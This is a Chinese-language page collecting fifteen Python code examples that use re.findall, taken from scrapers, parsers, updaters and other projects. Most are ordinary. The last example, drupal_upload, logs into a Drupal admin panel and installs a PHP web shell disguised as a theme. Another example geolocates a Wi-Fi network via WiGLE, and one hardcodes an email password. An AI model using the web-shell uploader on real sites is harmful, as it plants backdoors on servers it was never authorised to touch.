本文整理汇总了Python中re.findall函数的典型用法代码示例。如果您正苦于以下问题:Python findall函数的具体用法?Python findall怎么用?Python findall使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了findall函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: DownloadUpdate
def DownloadUpdate(self, file):
self.log('Downloading: %s' % file)
dirfile = os.path.join(self.UpdateTempDir,file)
dirname, filename = os.path.split(dirfile)
if not os.path.isdir(dirname):
try:
os.makedirs(dirname)
except:
self.log('Error creating directory: ' +dirname)
url = self.SVNPathAddress+urllib.quote(file)
try:
if re.findall(".xbt",url):
self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8"))
else: urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8") )
self.DownloadedFiles.append(urllib.unquote(url))
return 1
except:
try:
time.sleep(2)
if re.findall(".xbt",url):
self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
else: urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8") )
urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
self.DownloadedFiles.append(urllib.unquote(url))
return 1
except:
self.log("Download failed: %s" % url)
self.DownloadFailedFiles.append(urllib.unquote(url))
return 0
示例2: ident_author
def ident_author(name, pp=prompt_possibles):
orig_name = name
name = ''.join(re.findall('[A-Z0-9]+',name.upper()))
best_authors = []
with open('sample_data/author_names.json', 'r') as f:
j = json.load(f)
for b in j['results']['bindings']:
author_orig = b['name']['value']
uri = b['author']['value']
author = b['name']['value'].upper()
subnames = author_orig.split()
author = ''.join(re.findall('[A-Z0-9]+',author))
dist = jaccard_ngram_dist(name,author,3)
best_authors.append(((author_orig,uri),dist))
if len(subnames)>=2:
for sname in [subnames[0], subnames[-1]]:
sname = ''.join(re.findall('[A-Z0-9]+',sname))
dist = jaccard_ngram_dist(name,sname,3)
best_authors.append(((author_orig,uri),dist))
if len(best_authors)>20:
best_authors.sort(key=lambda x:x[1])
best_authors = best_authors[:5]
best_authors.sort(key=lambda x:x[1])
best_authors = best_authors[:5]
best_dist = best_authors[0][1]
possibles = [best_authors[0][0]]
for author, dist in best_authors[1:]:
percent_diff = (dist-best_dist)*2/float(dist+best_dist)
if percent_diff < __CUTOFF__:
possibles.append(author)
if len(possibles)>1:
identified = pp(orig_name, possibles)
else:
identified = possibles[0]
return identified
示例3: wigle_print
def wigle_print(username, password, netid):
browser = mechanize.Browser()
browser.open('http://wigle.net')
reqData = urllib.urlencode({'credential_0': username,
'credential_1': password})
browser.open('https://wigle.net//gps/gps/main/login', reqData)
params = {}
params['netid'] = netid
reqParams = urllib.urlencode(params)
respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
resp = browser.open(respURL, reqParams).read()
mapLat = 'N/A'
mapLon = 'N/A'
rLat = re.findall(r'maplat=.*\&', resp)
if rLat:
mapLat = rLat[0].split('&')[0].split('=')[1]
rLon = re.findall(r'maplon=.*\&', resp)
if rLon:
mapLon = rLon[0].split
print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
示例4: parse_log
def parse_log(log_file):
with open(log_file, 'r') as log_file2:
log = log_file2.read()
loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
losses = []
loss_iterations = []
fileName= os.path.basename(log_file)
for r in re.findall(loss_pattern, log):
loss_iterations.append(int(r[0]))
losses.append(float(r[1]))
loss_iterations = np.array(loss_iterations)
losses = np.array(losses)
accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
accuracies = []
accuracy_iterations = []
accuracies_iteration_checkpoints_ind = []
for r in re.findall(accuracy_pattern, log):
iteration = int(r[0])
accuracy = float(r[1]) * 100
if iteration % 10000 == 0 and iteration > 0:
accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations))
accuracy_iterations.append(iteration)
accuracies.append(accuracy)
accuracy_iterations = np.array(accuracy_iterations)
accuracies = np.array(accuracies)
return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
示例5: getCategoryUrl
def getCategoryUrl(site="",url=""):
catDb = openTable(tableName=global_setting['catTable'])
r = session.get(url)
if not r.text:
return False
soup = BeautifulSoup(r.text)
for level1 in soup.select('.classify_books'):
curLevel1 = level1.select('.classify_title')[0].text
curLevel1 = re.sub('\s', '', curLevel1)
for level2 in level1.select('.classify_kind'):
curLevel2 = level2.select('.classify_kind_name')[0].text
curLevel2 = re.sub('\s', '', curLevel2)
for level3 in level2.select('ul li a'):
#curLevel3 = re.sub('\s', '', level3.text)
curLevel3 = level3.text.strip()
curlUrl = level3['href']
retFind = re.findall(r'\/cp(.*)\.html',curlUrl)
if retFind:
curCatID = retFind[0]
catType = 'book'
else:
retFind = re.findall(r'\/cid(.*)\.html',curlUrl)
if retFind:
curCatID = retFind[0]
catType = 'nonbook'
if retFind:
if catDb.find({'catId':curCatID}).count() >0:
logger.debug('catetogy %s exists,skip\n'%(curCatID))
else:
catDb.insert({'catId':curCatID,'level1':curLevel1, 'level2':curLevel2, 'level3':curLevel3, 'catUrl':curlUrl,'catType':catType, 'site':site})
return True
示例6: __load_testdata
def __load_testdata(file):
"""
Reads the testdata out of a file. Testdata consists of exactly three
strings on each line, each one enclosed in quotation marks (" or ').
The first is the filename to be parsed, the second is the series name
that should be parsed out of it, and the third is the issue number string
that should be parsed out of it.
Blank lines and lines that begin with # are ignored.
"""
retval = []
if File.Exists(file):
with StreamReader(file, Encoding.UTF8, False) as sr:
line = sr.ReadLine()
while line is not None:
line = line.strip()
if len(line) > 0 and not line.startswith("#"):
if line.startswith('"'):
data = re.findall(r'"(.*?)"', line)
else:
data = re.findall(r"'(.*?)'", line)
if len(data) == 3:
data.append("")
if len(data) != 4:
raise Exception("badly formatted test data");
retval.append( data )
line = sr.ReadLine()
return retval
示例7: extractSrcFileData
def extractSrcFileData(self, path):
fileinput.close()
isLocListener = False
wakeLockAcqRegex = "invoke-virtual(.*?)Landroid/os/PowerManager$WakeLock;->acquire()"
domRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder()"
saxRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser()"
xmlppRegex = "invoke-static(.*?)Landroid/util/Xml;->newPullParser()"
for line in fileinput.input([path]):
matches = re.findall(wakeLockAcqRegex, line)
if len(matches) > 0:
self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1
if line.startswith(".implements Landroid/location/LocationListener;"):
self.numLocListeners = self.numLocListeners + 1
isLocListener = True
if isLocListener:
if "\"gps\"" in line:
self.numGpsUses = self. numGpsUses + 1
matches = re.findall(domRegex, line)
if len(matches) > 0:
self.numDomParser = self.numDomParser + 1
matches = re.findall(saxRegex, line)
if len(matches) > 0:
self.numSaxParser = self.numSaxParser + 1
matches = re.findall(xmlppRegex, line)
if len(matches) > 0:
self.numXMLPullParser = self.numXMLPullParser + 1
示例8: ReadProtonCounts
def ReadProtonCounts(inchi):
import re
#Get inchi layers
layers = inchi.split('/')
ProtLayer = ''
FixedLayer = ''
for l in layers[1:]:
if 'C' in l and 'H' in l:
atoms = re.findall(r"[a-zA-Z]+", l)
indexes = [int(x) for x in re.findall(r"\d+", l)]
formula = [list(x) for x in zip(atoms, indexes)]
if 'h' in l and ProtLayer != '':
FixedLayer = l[1:]
if 'h' in l and ProtLayer == '':
ProtLayer = l[1:]
#initialize proton list
nheavy = sum([x[1] for x in formula if x[0] != 'H'])
#Find, save and remove tautomeric portions from main proton layer
tautomerics = re.findall(r"\(.*?\)", ProtLayer)
ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer)
if ProtLayer[-1] == ',':
ProtLayer = ProtLayer[:-1]
#Read the main and the fixed proton layer
protons = ReadPSections(ProtLayer, nheavy)
fprotons = ReadPSections(FixedLayer, nheavy)
return protons, formula, tautomerics, fprotons
示例9: evalAtom
def evalAtom(self, atom, param_names):
if atom in self.consts:
return '(const _%s)'%atom
elif atom in param_names:
return '(param (paramref \"%s\"))'%atom
elif re.match(r'^\d+$', atom):
return '(const (intc %s))'%atom
elif atom.lower() in ['true', 'false']:
return '(const (boolc %s))'%atom.lower()
elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom):
if re.match(r'^forall.*end$', atom):
params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0]
else:
params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0]
param_name_dict, param_defs = analyzeParams(params)
for p in param_names:
if p not in param_name_dict: param_name_dict[p] = 0
text = self.splitText(text)
sub_form = self.evaluate(self.process(text), param_name_dict)
if re.match(r'^forall.*?end$', atom):
return '(forallFormula %s %s)'%(param_defs, sub_form)
else:
return '(existFormula %s %s)'%(param_defs, sub_form)
else:
return '(var %s)'%self.evalVar(atom)
示例10: showCovers_adddetail_csfd
def showCovers_adddetail_csfd(self, data, title):
title_s = re.findall('<title>(.*?)\|', data, re.S)
if title_s:
if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ":
csfd_title = title_s[0]
else:
csfd_title = title
print "EMC csfd: Movie name - %s" % csfd_title
else:
csfd_title = title
bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE)
if bild:
print "EMC csfd: Cover Select - %s" % title
self.cover_count = self.cover_count + 1
csfd_url = "http:" + bild[0].replace('\\','').strip()
self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S)
if bild:
bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE)
if bild1:
for each in bild1:
print "EMC csfd: Cover Select - %s" % title
self.cover_count = self.cover_count + 1
csfd_url = "http:" + each.replace('\\','').strip()
self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
else:
print "EMC csfd 3 : no else covers - %s" % title
else:
print "EMC csfd 2 : no else covers - %s" % title
else:
print "EMC csfd 1 : keine infos gefunden - %s" % title
示例11: __get_dom_elements
def __get_dom_elements(item, name, attrs):
if not attrs:
pattern = '(<%s(?:\s[^>]*>|/?>))' % (name)
this_list = re.findall(pattern, item, re.M | re.S | re.I)
else:
last_list = None
for key, value in attrs.iteritems():
value_is_regex = isinstance(value, re_type)
value_is_str = isinstance(value, basestring)
pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key)
re_list = re.findall(pattern, item, re.M | re. S | re.I)
if value_is_regex:
this_list = [r[0] for r in re_list if re.match(value, r[2])]
else:
temp_value = [value] if value_is_str else value
this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))]
if not this_list:
has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value)
if not has_space:
pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key)
re_list = re.findall(pattern, item, re.M | re. S | re.I)
if value_is_regex:
this_list = [r[0] for r in re_list if re.match(value, r[1])]
else:
this_list = [r[0] for r in re_list if value == r[1]]
if last_list is None:
last_list = this_list
else:
last_list = [item for item in this_list if item in last_list]
this_list = last_list
return this_list
示例12: weatherReport
def weatherReport():
htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US')
htmltext = htmlfile.read()
rnTemp = '<span itemprop="temperature-fahrenheit">(.+?)</span>'
conditions = '<div class="wx-phrase ">(.+?)</div>'
tonightTemp = '<div class="wx-temperature">(.+?)</div>'
rntPattern = re.compile(rnTemp)
conditionsPattern = re.compile(conditions)
tonightTempPattern = re.compile(tonightTemp)
rntInstance = re.findall(rntPattern, htmltext)
conditionsInstance = re.findall(conditionsPattern, htmltext)
tonightTempInstance = re.findall(tonightTempPattern, htmltext)
currentConditions = conditionsInstance[0]
tonightConditions = conditionsInstance[2]
currentTemp = rntInstance[0]
tonightTemp = tonightTempInstance[2][:2]
print currentTemp
to = ['[email protected]', '[email protected]']
sender = 'weather.bot1'
subject = 'Your Daily Weather Forecast is Here'
bodymsg = "Right now: " + currentTemp +' degrees.' + ' ' + currentConditions + '.' + "\n" +"Tonight: " + \
tonightTemp + ' degrees.' + ' ' + tonightConditions + '.\n\n' + "Read more about today's weather here: "\
"http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n" + "This message was mad by request via WeatherBot.\nHave a great day."
for address in to:
createMessage(address, '[email protected]', 'skytower', subject, bodymsg)
return
示例13: get_episode
def get_episode(self,url):
html = self.fetch_url(url)
divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html)
result = []
if divs:
for div in divs:
# 链接 第N集 小标题
r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1])
if r: #电视剧
for ep_data in r:
result.append({"title":ep_data[1] + " " + ep_data[2],
"img":"",
"url":ep_data[0]})
else:
# 链接 标题 小标题 期数(日期)
r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1])
if r: #综艺
for ep_data in r:
dateA = ep_data[3].split("-")
date = ""
if len(dateA) == 3: #2012-08-12
date = "%s.%s.%s" % (dateA[2],dateA[1],dateA[0])
result.append({"title":ep_data[1] + " " + ep_data[2],
"img":"",
"url":ep_data[0],
"date":date})
return result
#aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
示例14: parse_current_docket
def parse_current_docket(docket_record):
# grab the file with the URL mangled slightly to grab 100k records
docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read()
page = pq(etree.fromstring(docket_file, parser))
docket = dict(docket_record)
docket['title'] = page('.dyn_wrap h1').text().strip()
assert docket['title'], 'no title found'
headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()]
docket['comments'] = []
# check if there's a no-records message
if len(page('.rgMasterTable .rgNoRecords')):
return docket
for row in page('.rgMasterTable tbody tr').items():
tds = row.find('td')
cell_text = [item.text().strip() for item in tds.items()]
cdata = dict(zip(headers, cell_text))
link = pq(tds[-1]).find('a')
doc = {
'url': urlparse.urljoin(docket['url'], link.attr('href')),
'details': {},
'release': [fix_spaces(cdata['Release'])],
'date': cdata['Date Received'],
'doctype': 'public_submission',
}
vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url'])
if vc_matches:
doc['id'] = vc_matches[0]
doc['subtype'] = 'comment'
detail_columns = ['Organization', 'First Name', 'Last Name']
else:
ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url'])
if ep_matches:
doc['id'] = "EP-%s" % ep_matches[0]
doc['subtype'] = 'exparte'
detail_columns = ['Organization']
else:
assert False, "expected either comment or exparte link: %s" % doc['url']
for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')):
if cftc_label in detail_columns and cdata[cftc_label]:
doc['details'][rdg_label] = cdata[cftc_label]
docket['comments'].append(doc)
assert len(docket['comments']) < 100000, "we probably exceeded one page"
# then strip out all the ones that aren't about this document
release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip())
docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release]
return docket
示例15: drupal_upload
def drupal_upload(url, login, pwd):
print '[*] Trying to install theme with shell.'
dpl_sess = drupal_admin(url, login, pwd)
info = 'name = '+globals.SHELL_NAME+'\ndescription = '+globals.SHELL_NAME+'\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = '+globals.SHELL_EXT
page = dpl_sess.get(url+"?q=admin/appearance/install")
token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />',page.text)
token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />',page.text)
if (token1 == []) or (token2 == []):
print '[-] Failed to get token. Login or password incorrect or not supported Drupal version.'
sys.exit()
post = {'form_build_id' : str(token1[0]),
'form_token' : str(token2[0]),
'form_id' : 'update_manager_install_form',
'op' : 'Install'}
print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME)
arch = zipfile.ZipFile(globals.SHELL_NAME+".zip", 'w')
arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_EXT, globals.PHP_EXEC)
arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_NAME+".info",info)
arch.close()
file = {'files[project_upload]' : (globals.SHELL_NAME+".zip",open(globals.SHELL_NAME+".zip",'rb'),'application/zip')}
print '[*] Trying to upload zip file.'
up = dpl_sess.post(url+"?q=admin/appearance/install",files=file,data=post,timeout=None)
get_link = re.findall('URL=(.*?)" />',up.text)
if not get_link:
print '[-] Failed to upload zip file. Try one more time.'
sys.exit()
link = str(get_link[0]).replace('&','&')
dpl_sess.get(link)
shell = url+"sites/all/themes/"+globals.SHELL_NAME+"/"+globals.SHELL_EXT
check = dpl_sess.get(shell)
if check.status_code == 200:
return shell
else:
print '[-] Themes or tmp directories is not writable.'
sys.exit()